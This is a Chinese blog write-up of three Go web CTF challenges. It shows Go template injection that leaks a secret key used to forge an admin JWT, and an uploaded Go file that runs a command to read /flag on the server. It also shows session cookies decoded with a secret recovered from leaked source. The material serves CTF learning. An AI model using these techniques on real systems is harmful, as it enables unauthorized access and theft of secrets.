CTF—Go题目复现

已于 2023-11-06 13:35:15 修改
阅读量2.8k 收藏 1
点赞数 1
分类专栏: Golang CTF WP 文章标签: golang 学习 开发语言
于 2022-06-23 08:29:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/125419981
版权
CTF 同时被 3 个专栏收录
23 篇文章 1 订阅
订阅专栏
WP
20 篇文章 1 订阅
订阅专栏
Golang
10 篇文章 1 订阅
订阅专栏

[2022DASCTF MAY 挑战赛] fxygo

一道Go的模板注入

前置知识

由于没了解过Go的SSTI所以先简单看下:

go语言快速入门:template模板 · Golang语言社区 · 看云 (kancloud.cn)

Go SSTI初探 | tyskillのBlog

go的SSTI漏洞成因与模板语法和jinja2差不多,都用到了{{}},通过{{.}}我们可以获得到作用域

Demo

package main

import "html/template"
import "os"

func main() {

	type person struct {
		Id      int
		Name    string
		Country string
	}

	Sentiment := person{Id: 1, Name: "Sentiment", Country: "China"}

	tmpl := template.New("")
	tmpl.Parse("Hello {{.}}")
	tmpl.Execute(os.Stdout, Sentiment)

}

当使用{{.}}时,会获取person结构体中的所有属性,所以在经过Execute渲染后,便会输出:

Hello {1 Sentiment China}

除此外若想获取单个属性也可以用{{.Name}}

tmpl.Parse("Hello {{.}}")
改为
tmpl.Parse("Hello {{.Name}}")

结果

Hello Sentiment

复现

主要有几个路由

r.GET("/",index)
r.POST("/", rootHandler)
r.POST("/flag", flagHandler)
r.POST("/auth", authHandler)
r.POST("/register", Resist)

先看/flag的flagHandler

func flagHandler(c *gin.Context) {
   token := c.GetHeader("X-Token")
   if token != "" {
      id, is_admin := jwt_decode(token)
      if is_admin == true {
         p := Resp{true, "Hi " + id + ", flag is " + flag}
         res, err := json.Marshal(p)
         if err != nil {
         }
         c.JSON(200, string(res))
         return
      } else {
         c.JSON(403, gin.H{
            "code": 403,
            "status": "error",
         })
         return
      }
   }
}

中间有一段:

id, is_admin := jwt_decode(token)
if is_admin == true {

会对我们输入的token值解密,之后如果其中的is_admin是true的话,会输出flag,所以现在的问题是如何获取token

authHandler()找到了获取token的方式

func authHandler(c *gin.Context) {
   uid := c.PostForm("id")
   upw := c.PostForm("pw")
   if uid == "" || upw == "" {
      return
   }
   if len(acc) > 1024 {
      clear_account()
   }
   user_acc := get_account(uid)
   if user_acc.id != "" && user_acc.pw == upw {
      token, err := jwt_encode(user_acc.id, user_acc.is_admin)
      if err != nil {
         return
      }
      p := TokenResp{true, token}
      res, err := json.Marshal(p)
      if err != nil {
      }
      c.JSON(200, string(res))
      return
   }
   c.JSON(403, gin.H{
      "code": 403,
      "status": "error",
   })
   return
}

当我们传参id和pw时,会对我们传入的id和is_admin进行jwt加密,并返回以token形式返回

但在此之前需要注意,在赋值之前是有一段判断的,也就是通过本题自定义的get_account()方法获取之前的作用域中的id和pw值,与我们创建的进行比较,只有一样才能成功赋值

user_acc := get_account(uid)
user_acc.id != "" && user_acc.pw == upw {

而初始状态都是为空值的,所以在获取前需要先通过Resist(),进行赋值注册

在这里插入图片描述

注册成功后,在访问auth路径,获取到了token

在这里插入图片描述

得到token后,还需要解决一个问题,就是我们在注册时,默认传入的is_admin是false

new_acc := Account{uid, upw, false, secret_key}

在这里插入图片描述

所以就需要想办法找secret_key,进而修改is_admin

rootHandler()发现模板渲染部分,首先是获取token中我们传入的id值,接着会进行渲染,最后通过 tpl.Execute(c.Writer, &acc)输出

func rootHandler(c *gin.Context) {
   token := c.GetHeader("X-Token")
   if token != "" {
      id, _ := jwt_decode(token)
      acc := get_account(id)
      tpl, err := template.New("").Parse("Logged in as " + acc.id)
      if err != nil {
      }
      tpl.Execute(c.Writer, &acc)
      return
   } else {

      return
   }
}

所以我们在最开始传入的id={{.}},在这个地方经过渲染后便会输出,该结构体中的所有属性值,其中就包括key

type Account struct {
   id         string
   pw         string
   is_admin   bool
   secret_key string
}

rootHandler()的路由是POST请求/

在这里插入图片描述

获取key后,修改is_admin,/flag路由下传参即可

在这里插入图片描述

在这里插入图片描述

这道题跟[LineCTF2022]gotm一样,80分的题可以去玩玩。

[2022DASCTF MAY 挑战赛] hackme

upload路径下有个文件上传入口

在这里插入图片描述

上传users.go后,访问users,上传的go文件会被执行,所以随便上传个执行命令的go文件即可

Go语言中用 os/exec 执行命令的五种姿势 - 知乎 (zhihu.com)

package main

import (
   "bytes"
   "fmt"
   "log"
   "os/exec"
)

func main() {
   cmd := exec.Command("cat", "/flag")
   var stdout, stderr bytes.Buffer
   cmd.Stdout = &stdout 
   cmd.Stderr = &stderr 
   err := cmd.Run()
   outStr, errStr := string(stdout.Bytes()), string(stderr.Bytes())
   fmt.Printf("out:\n%s\nerr:\n%s\n", outStr, errStr)
   if err != nil {
      log.Fatalf("cmd.Run() failed with %s\n", err)
   }
}

在这里插入图片描述

[VNCTF 2022] gocalc0

在安装包时不知道什么时候代理变了,一直没下下来,如果同样下不下来的话可以先设置下代理

go env -w GOPROXY=https://goproxy.cn

之后安装对应的包即可

go get github.com/gin-contrib/sessions

非预期

session两次base64解密即可

在这里插入图片描述

预期

{{.}}获取源码

package main

import (
	_ "embed"
	"fmt"
	"os"
	"reflect"
	"strings"
	"text/template"

	"github.com/gin-contrib/sessions"
	"github.com/gin-contrib/sessions/cookie"
	"github.com/gin-gonic/gin"
	"github.com/maja42/goval"
)

var tpl string

var source string

type Eval struct {
	E string `json:"e" form:"e" binding:"required"`
}

func (e Eval) Result() (string, error) {
	eval := goval.NewEvaluator()
	result, err := eval.Evaluate(e.E, nil, nil)
	if err != nil {
		return "", err
	}
	t := reflect.ValueOf(result).Type().Kind()

	if t == reflect.Int {
		return fmt.Sprintf("%d", result.(int)), nil
	} else if t == reflect.String {
		return result.(string), nil
	} else {
		return "", fmt.Errorf("not valid type")
	}
}

func (e Eval) String() string {
	res, err := e.Result()
	if err != nil {
		fmt.Println(err)
		res = "invalid"
	}
	return fmt.Sprintf("%s = %s", e.E, res)
}

func render(c *gin.Context) {
	session := sessions.Default(c)

	var his string

	if session.Get("history") == nil {
		his = ""
	} else {
		his = session.Get("history").(string)
	}

	fmt.Println(strings.ReplaceAll(tpl, "{{result}}", his))
	t, err := template.New("index").Parse(strings.ReplaceAll(tpl, "{{result}}", his))
	if err != nil {
		fmt.Println(err)
		c.String(500, "internal error")
		return
	}
	if err := t.Execute(c.Writer, map[string]string{
		"s0uR3e": source,
	}); err != nil {
		fmt.Println(err)
	}
}

func main() {
	port := os.Getenv("PORT")
	if port == "" {
		port = "8888"
	}

	r := gin.Default()
	store := cookie.NewStore([]byte("woW_you-g0t_sourcE_co6e"))
	r.Use(sessions.Sessions("session", store))

	r.GET("/", func(c *gin.Context) {
		render(c)
	})

	r.GET("/flag", func(c *gin.Context) {
		session := sessions.Default(c)
		session.Set("FLAG", os.Getenv("FLAG"))
		session.Save()
		c.String(200, "flag is in your session")
	})

	r.POST("/", func(c *gin.Context) {
		session := sessions.Default(c)

		var his string

		if session.Get("history") == nil {
			his = ""
		} else {
			his = session.Get("history").(string)
		}

		eval := Eval{}
		if err := c.ShouldBind(&eval); err == nil {
			his = his + eval.String() + "<br/>"
		}
		session.Set("history", his)
		session.Save()
		render(c)
	})

	r.Run(fmt.Sprintf(":%s", port))
}

在flag路由里将环境变量flag值设入cookie的FLAG中,但是cookie中的内容经过加密无法直接拿到,在本地搭建一样的环境,从相同cookie中拿到FLAG对应的值,找地方输出即可

package main

import (
   _ "embed"
   "fmt"
   "os"

   "github.com/gin-contrib/sessions"
   "github.com/gin-contrib/sessions/cookie"
   "github.com/gin-gonic/gin"
)

func main() {
   port := os.Getenv("PORT")
   if port == "" {
      port = "8888"
   }
   r := gin.Default()
   store := cookie.NewStore([]byte("woW_you-g0t_sourcE_co6e"))
   r.Use(sessions.Sessions("session", store))
   r.GET("/flag", func(c *gin.Context) {
      session := sessions.Default(c)
      c.String(200, session.Get("FLAG").(string))
   })
   r.Run(fmt.Sprintf(":%s", port))
}

在这里插入图片描述

S1nJa
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
6.2 Go如何使用session
Kaitiren的专栏
02-01 479
通过上一小节的介绍,我们知道session是在服务器端实现的一种用户和服务器之间认证的解决方案,目前Go标准包没有为session提供任何支持,这小节我们将会自己动手来实现go版本的session管理和创建。 session创建过程 session的基本原理是由服务器为每个会话维护一份信息数据,客户端和服务端依靠一个全局唯一的标识来访问这份数据,以达到交互的目的。当用户访问Web应用时,服务端程序会随需要创建session,这个过程可以概括为三个步骤: 生成全局唯一标识符(sessionid); 开
CTF从入门到提升(十三)文件包含session及例题详解
anquanniu的博客
09-12 2729
具体场景——session 我们可以查一下手册,看看这个参数是默认开启: 举栗子 ​ 通过上传一个orange作为key传一个值传给这个变量,放到file函数中,再去比对file函数读取结果文件中的第一行0前面六个字符串是否匹配,如果是orange就会作为包含,否则就会显示源代码。 这道题的难点在于包含一个文件要控制里面的内容,file函数的作用是把一个整一个文件读到一个数据中去,file...
go基础知识点
qq_40530622的博客
04-29 292
nil 是 interface、function、pointer、map、slice 和 channel 类型变量的默认初始值。
2024年Go最新Google-CTF-2016-Stego,2024年最新整理出Golang逆向系列学习进阶视频
最新发布
2401_84910951的博客
05-11 308
【代码】2024年Go最新Google-CTF-2016-Stego,2024年最新整理出Golang逆向系列学习进阶视频。
结合CVE-2019-14809的一道go语言CTF
HuaSir的博客
06-22 1842
题目 绕过下列过滤函数 package main import ( "fmt" "io/ioutil" "log" "net/http" "net/url" "strings" ) func SanCheck(input string) error { u, err := url.Parse(input) if err != nil { return err } if u.Scheme != "http" { return fmt.Errorf("err: Invalid
CTFweb篇-反序列化和SESSION(一)
weixin_44597701的博客
08-09 1048
前面讲到过一点SESSION,这里要继续说一点 SESSION的几种形式 这里是binary session的形成方法可以在php.ini中设置。默认是php(可能是php_serialize) 例子: php形式: php_serialize形式: php_binary: ini_set() ini_set ( string $varname , string $newvalue ) 在配置文件中设置配置的值 ini_set('session.serialize_handles','php')
CTF-Web20(涉及简单的cookie与session)
→_→
09-21 4694
20.Guess Next Session 分析: 观察代码,在代码中并没有什么函数,关键就在于:password = $_session['password']。 问题到了这一步,让我们把这放下,先来分析一下PHP中的Session和Cookie。 Cookie与 Session,一般都会认为这是两个独立完全不同的东西,Session采用的是在服务器端保持状态的方案,而Cookie采用的是在客户端保持状态的方案。在PHP配置中的默认情况下,Session是用Session ID来确.
CTF比赛题目复现源码+项目说明.zip
01-16
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 3、本资源作为“参考资料...CTF比赛题目复现源码+项目说明.zip
2023陕西CTF部分题目
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
2022工业互联网大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
CTF100题目-安全考题竞赛
04-26
在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、...
CTF从入门到提升(十四)session phpinfo包含及例题详解
anquanniu的博客
09-16 1876
具体场景——session PHP默认生成的session文件往往存放在/tmp目录下 举栗子 ​ 题目内容:看看我的notebooktips; tips:文件包含phpinfo是不是有新的发现 用给到的内容去做题目,我们可以看一下这道题目,进来之后首页找到url。 如果把php删掉,会发现登录入口不存在,初步推断php是后缀名会自动拼接到URL后面。 有了这个设想判断后,我们去读文件log...
XCTF easy_go
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-15 827
运行下看下 go语言程序,参考网上的wp,go语言无符号逆向,网上的wp大多数使用IDA脚本进行符号还原;我是来下,不懂为啥脚本在我的IDA7.0下都不正常。然后。。我就睡觉了 第二天起床又搜索了下,发现另一位大哥的方法很好,记录下 我在IDA中Shift+F12搜素关键字符串,没找到。大佬用WinHex搜索,学习下 搜索到一个提示成功的字符串,我们拿它的文件偏移加一下IDA的基质,在IDA...
CTFweb篇-Session包含
weixin_44597701的博客
08-07 3818
什么是Session Session就是保存在服务器的文本文件。 默认情况下,PHP.ini 中设置的 SESSION 保存方式是 files(session.save_handler = files),即使用读写文件的方式保存 SESSION 数据,而 SESSION 文件保存的目录由 session.save_path 指定,文件名以 sess_ 为前缀,后跟 SESSION ID,如:sess_c72665af28a8b14c0fe11afe3b59b51b。文件中的数据即是序列化之后的 SESSIO
session存页面相关的问题_CTFweb类型(二十四)session序列化相关问题及例题、以及phar序列化的讲解...
weixin_39797912的博客
01-24 81
点击上方蓝色字体,关注我们PHP session序列化及反序列化处理器在php中存储session时存储的数据结结构是有区别的,正常情况下,session是以键值对的形式存在。demo这里设置处理方式是php的,它会去存储一个session,开一个标签,session是存储在temp目录里,一个session及它存储位置是怎么判断呢?来看这个phpinfo.php,session发现存...
CTF题GoNative破解过程记录
weixin_42454310的博客
11-14 306
一道CTF题,找到正确的flag即可. 懒得再编辑一次了,地址:CTF题GoNative破解过程记录
[MRCTF2020]hello_world_go-buuctf
Lenard404的博客
03-14 4251
Go语言的二进制文件,简单的明文flag,应该是Go逆向的引进门题目
[CISCN 2023 初赛]go_session 解题思路&过程
iamblackcat's blog
07-23 997
[CISCN 2023 初赛]go_session 解题思路&过程
CTF reverse
12-25
CTF reverse(CTF逆向工程)是指在CTF竞赛中涉及到的逆向分析和破解技术。逆向工程是通过对软件进行反汇编、反编译等操作,来理解其内部结构和实现原理的过程。在CTF reverse中,参赛选手需要具备较强的逆向分析能力,能够通过逆向分析来猜测软件的功能和实现思路,并进行验证。 CTF reverse的主要目标是解决给定的逆向工程问题,例如破解密码、还原加密算法、分析恶意软件等。参赛选手需要使用逆向工程技术来分析和理解给定的程序或者二进制文件,找出其中隐藏的信息和漏洞,并利用这些信息来解决问题。 在CTF reverse中,常用的工具包括IDA Pro、OllyDbg、Ghidra等。参赛选手可以使用这些工具来进行反汇编、反编译、调试等操作,以便深入理解程序的运行机制和逻辑。 总结起来,CTF reverse是一项需要逆向分析能力的竞赛项目,参赛选手通过对软件进行逆向工程来解决给定的问题。这需要他们具备扎实的逆向分析技术和对计算机系统的深入理解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值